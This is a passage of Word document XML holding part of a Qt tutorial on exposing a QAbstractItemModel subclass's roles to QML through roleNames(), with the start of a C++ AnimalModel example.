          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclassing</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2623" w:history="1">
        <w:r w:rsidRPr="00AC1824">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is the best approach if you have a more complex model that cannot be supported by the other approaches. A</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2624" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can also </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>automatically notify a QML view when the model data changes</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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The roles of a</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2625" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclass can be exposed to QML by reimplementing</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2626" w:anchor="roleNames" w:history="1">
        <w:r w:rsidRPr="00AC1824">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel::roleNames</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="00AC1824" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here is an application with a</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2627" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclass named</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AnimalModel</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which exposes the</w:t>
      </w:r>
      <w:r w:rsidR="009527B0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidR="009527B0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="009527B0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizes</w:t>
      </w:r>
      <w:r w:rsidR="009527B0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>roles. It reimplements</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2628" w:anchor="roleNames" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel::roleNames</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to expose the role names, so that they can be accessed via QML:</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00E46B36">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="00E46B36" w:rsidRPr="008D4C56">
        <w:rPr>
          <w:i/>
          <w:color w:val="262626"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</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Animal</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</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Animal</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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QString</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type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const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QString</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>size</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</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AnimalModel</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public</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QAbstractListModel</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Q_OBJECT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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enum</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AnimalRoles</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88385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">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TypeRole</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Qt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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UserRole</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">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SizeRole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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AnimalModel</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QObject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parent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0</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D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QHash</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int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QByteArray</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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AnimalModel</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roleNames</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">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QHash</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QByteArray</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> roles</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">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roles</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TypeRole</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"type"</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">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roles</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SizeRole</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w: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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"size"</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
